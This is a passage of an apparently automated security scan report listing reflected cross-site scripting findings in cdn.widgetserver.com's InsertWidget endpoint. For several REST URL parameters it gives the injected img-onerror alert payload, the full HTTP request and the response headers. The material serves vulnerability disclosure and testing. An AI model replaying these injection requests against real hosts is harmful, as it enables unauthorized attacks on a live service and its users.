This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:3cf92<img%20src%3da%20onerror%3dalert(1)>c32d66ccddf/ad.doubleclick.net/clk HTTP/1.1 Host: cdn.widgetserver.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Thu, 16 Dec 2010 15:01:02 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Connection: close Content-Length: 17779
The value of REST URL parameter 11 is copied into the HTML document as plain text between tags. The payload db50d<img%20src%3da%20onerror%3dalert(1)>7a79867db58 was submitted in the REST URL parameter 11. This input was echoed as db50d<img src=a onerror=alert(1)>7a79867db58 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.netdb50d<img%20src%3da%20onerror%3dalert(1)>7a79867db58/clk HTTP/1.1 Host: cdn.widgetserver.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Thu, 16 Dec 2010 15:01:06 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Content-Length: 17779 Connection: close
The value of REST URL parameter 12 is copied into the HTML document as plain text between tags. The payload 7fa15<img%20src%3da%20onerror%3dalert(1)>ad69b791dbc was submitted in the REST URL parameter 12. This input was echoed as 7fa15<img src=a onerror=alert(1)>ad69b791dbc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk7fa15<img%20src%3da%20onerror%3dalert(1)>ad69b791dbc HTTP/1.1 Host: cdn.widgetserver.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Thu, 16 Dec 2010 15:01:09 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Connection: close Content-Length: 17787
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d8e22<img%20src%3da%20onerror%3dalert(1)>438d8369141 was submitted in the REST URL parameter 4. This input was echoed as d8e22<img src=a onerror=alert(1)>438d8369141 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/idd8e22<img%20src%3da%20onerror%3dalert(1)>438d8369141/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk HTTP/1.1 Host: cdn.widgetserver.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Thu, 16 Dec 2010 15:00:45 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Connection: close Content-Length: 17779
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8653d<img%20src%3da%20onerror%3dalert(1)>f2b799089e1 was submitted in the REST URL parameter 5. This input was echoed as 8653d<img src=a onerror=alert(1)>f2b799089e1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce8653d<img%20src%3da%20onerror%3dalert(1)>f2b799089e1/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk HTTP/1.1 Host: cdn.widgetserver.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Thu, 16 Dec 2010 15:00:48 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Connection: close Content-Length: 17787
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload e1858<img%20src%3da%20onerror%3dalert(1)>142cee02189 was submitted in the REST URL parameter 6. This input was echoed as e1858<img src=a onerror=alert(1)>142cee02189 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:e1858<img%20src%3da%20onerror%3dalert(1)>142cee02189/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk HTTP/1.1 Host: cdn.widgetserver.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Thu, 16 Dec 2010 15:00:51 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Connection: close Content-Length: 17779
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 51606<img%20src%3da%20onerror%3dalert(1)>5910305e668 was submitted in the REST URL parameter 7. This input was echoed as 51606<img src=a onerror=alert(1)>5910305e668 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com51606<img%20src%3da%20onerror%3dalert(1)>5910305e668/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk HTTP/1.1 Host: cdn.widgetserver.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Thu, 16 Dec 2010 15:00:54 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Content-Length: 17779 Connection: close
The value of REST URL parameter 8 is copied into the HTML document as plain text between tags. The payload 7207f<img%20src%3da%20onerror%3dalert(1)>2037fd07834 was submitted in the REST URL parameter 8. This input was echoed as 7207f<img src=a onerror=alert(1)>2037fd07834 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded7207f<img%20src%3da%20onerror%3dalert(1)>2037fd07834/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk HTTP/1.1 Host: cdn.widgetserver.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Thu, 16 Dec 2010 15:00:57 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Connection: close Content-Length: 17787
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload f2f8d<img%20src%3da%20onerror%3dalert(1)>aae1b279c95 was submitted in the REST URL parameter 9. This input was echoed as f2f8d<img src=a onerror=alert(1)>aae1b279c95 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96f2f8d<img%20src%3da%20onerror%3dalert(1)>aae1b279c95/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk HTTP/1.1 Host: cdn.widgetserver.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Thu, 16 Dec 2010 15:01:00 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Connection: close Content-Length: 17787
The value of REST URL parameter 10 is copied into the HTML document as plain text between tags. The payload 5b7cf<img%20src%3da%20onerror%3dalert(1)>bbac3dee5f9 was submitted in the REST URL parameter 10. This input was echoed as 5b7cf<img src=a onerror=alert(1)>bbac3dee5f9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:5b7cf<img%20src%3da%20onerror%3dalert(1)>bbac3dee5f9//ad.doubleclick.net/clk HTTP/1.1 Host: cdn.widgetserver.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Thu, 16 Dec 2010 15:01:06 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Connection: close Content-Length: 17790
The value of REST URL parameter 11 is copied into the HTML document as plain text between tags. The payload ef608<img%20src%3da%20onerror%3dalert(1)>591e49029cb was submitted in the REST URL parameter 11. This input was echoed as ef608<img src=a onerror=alert(1)>591e49029cb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.netef608<img%20src%3da%20onerror%3dalert(1)>591e49029cb/clk HTTP/1.1 Host: cdn.widgetserver.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Thu, 16 Dec 2010 15:01:09 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Connection: close Content-Length: 17790
The value of REST URL parameter 12 is copied into the HTML document as plain text between tags. The payload 7f6e7<img%20src%3da%20onerror%3dalert(1)>f5159348289 was submitted in the REST URL parameter 12. This input was echoed as 7f6e7<img src=a onerror=alert(1)>f5159348289 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk7f6e7<img%20src%3da%20onerror%3dalert(1)>f5159348289 HTTP/1.1 Host: cdn.widgetserver.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Thu, 16 Dec 2010 15:01:12 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Connection: close Content-Length: 17790
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f479f<img%20src%3da%20onerror%3dalert(1)>391274cdfc2 was submitted in the REST URL parameter 4. This input was echoed as f479f<img src=a onerror=alert(1)>391274cdfc2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/idf479f<img%20src%3da%20onerror%3dalert(1)>391274cdfc2/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk HTTP/1.1 Host: cdn.widgetserver.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Thu, 16 Dec 2010 15:00:48 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Connection: close Content-Length: 17790
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload dc396<img%20src%3da%20onerror%3dalert(1)>3789c81a41d was submitted in the REST URL parameter 5. This input was echoed as dc396<img src=a onerror=alert(1)>3789c81a41d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475dc396<img%20src%3da%20onerror%3dalert(1)>3789c81a41d/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk HTTP/1.1 Host: cdn.widgetserver.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Thu, 16 Dec 2010 15:00:51 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Connection: close Content-Length: 17790
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload e1ad5<img%20src%3da%20onerror%3dalert(1)>e2109e2c33e was submitted in the REST URL parameter 6. This input was echoed as e1ad5<img src=a onerror=alert(1)>e2109e2c33e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:e1ad5<img%20src%3da%20onerror%3dalert(1)>e2109e2c33e//img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk HTTP/1.1 Host: cdn.widgetserver.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Thu, 16 Dec 2010 15:00:54 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Connection: close Content-Length: 17790
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 7e6dd<img%20src%3da%20onerror%3dalert(1)>f1f9cf33df7 was submitted in the REST URL parameter 7. This input was echoed as 7e6dd<img src=a onerror=alert(1)>f1f9cf33df7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com7e6dd<img%20src%3da%20onerror%3dalert(1)>f1f9cf33df7/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk HTTP/1.1 Host: cdn.widgetserver.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Thu, 16 Dec 2010 15:00:57 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Connection: close Content-Length: 17782
The value of REST URL parameter 8 is copied into the HTML document as plain text between tags. The payload aa6fc<img%20src%3da%20onerror%3dalert(1)>c10e1999b07 was submitted in the REST URL parameter 8. This input was echoed as aa6fc<img src=a onerror=alert(1)>c10e1999b07 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploadedaa6fc<img%20src%3da%20onerror%3dalert(1)>c10e1999b07/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk HTTP/1.1 Host: cdn.widgetserver.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Thu, 16 Dec 2010 15:00:59 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Connection: close Content-Length: 17790
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 525ac<img%20src%3da%20onerror%3dalert(1)>31e1f24bbff was submitted in the REST URL parameter 9. This input was echoed as 525ac<img src=a onerror=alert(1)>31e1f24bbff in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05525ac<img%20src%3da%20onerror%3dalert(1)>31e1f24bbff/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk HTTP/1.1 Host: cdn.widgetserver.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Thu, 16 Dec 2010 15:01:03 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Connection: close Content-Length: 17782
The value of REST URL parameter 10 is copied into the HTML document as plain text between tags. The payload 7f7f5<img%20src%3da%20onerror%3dalert(1)>3c654610702 was submitted in the REST URL parameter 10. This input was echoed as 7f7f5<img src=a onerror=alert(1)>3c654610702 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:7f7f5<img%20src%3da%20onerror%3dalert(1)>3c654610702/ad.doubleclick.net/clk HTTP/1.1 Host: cdn.widgetserver.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Thu, 16 Dec 2010 15:01:04 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Connection: close Content-Length: 17780
The value of REST URL parameter 11 is copied into the HTML document as plain text between tags. The payload a0036<img%20src%3da%20onerror%3dalert(1)>08dc7b33eb9 was submitted in the REST URL parameter 11. This input was echoed as a0036<img src=a onerror=alert(1)>08dc7b33eb9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.neta0036<img%20src%3da%20onerror%3dalert(1)>08dc7b33eb9/clk HTTP/1.1 Host: cdn.widgetserver.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Thu, 16 Dec 2010 15:01:08 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Connection: close Content-Length: 17788
The value of REST URL parameter 12 is copied into the HTML document as plain text between tags. The payload 44b22<img%20src%3da%20onerror%3dalert(1)>852bd0645a2 was submitted in the REST URL parameter 12. This input was echoed as 44b22<img src=a onerror=alert(1)>852bd0645a2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk44b22<img%20src%3da%20onerror%3dalert(1)>852bd0645a2 HTTP/1.1 Host: cdn.widgetserver.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Thu, 16 Dec 2010 15:01:11 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Connection: close Content-Length: 17788
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c5a01<img%20src%3da%20onerror%3dalert(1)>226f8532ecf was submitted in the REST URL parameter 4. This input was echoed as c5a01<img src=a onerror=alert(1)>226f8532ecf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/idc5a01<img%20src%3da%20onerror%3dalert(1)>226f8532ecf/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk HTTP/1.1 Host: cdn.widgetserver.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Thu, 16 Dec 2010 15:00:47 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Connection: close Content-Length: 17788
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload cee27<img%20src%3da%20onerror%3dalert(1)>ee6ba422ee7 was submitted in the REST URL parameter 5. This input was echoed as cee27<img src=a onerror=alert(1)>ee6ba422ee7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475cee27<img%20src%3da%20onerror%3dalert(1)>ee6ba422ee7/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk HTTP/1.1 Host: cdn.widgetserver.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Thu, 16 Dec 2010 15:00:50 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Connection: close Content-Length: 17788
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 3a824<img%20src%3da%20onerror%3dalert(1)>faddef53f15 was submitted in the REST URL parameter 6. This input was echoed as 3a824<img src=a onerror=alert(1)>faddef53f15 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:3a824<img%20src%3da%20onerror%3dalert(1)>faddef53f15/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk HTTP/1.1 Host: cdn.widgetserver.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Thu, 16 Dec 2010 15:00:53 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Connection: close Content-Length: 17780
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 4c632<img%20src%3da%20onerror%3dalert(1)>ab7a6b90e92 was submitted in the REST URL parameter 7. This input was echoed as 4c632<img src=a onerror=alert(1)>ab7a6b90e92 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com4c632<img%20src%3da%20onerror%3dalert(1)>ab7a6b90e92/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk HTTP/1.1 Host: cdn.widgetserver.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Thu, 16 Dec 2010 15:00:56 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Connection: close Content-Length: 17780
The value of REST URL parameter 8 is copied into the HTML document as plain text between tags. The payload 4b7a4<img%20src%3da%20onerror%3dalert(1)>a00070d10d9 was submitted in the REST URL parameter 8. This input was echoed as 4b7a4<img src=a onerror=alert(1)>a00070d10d9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
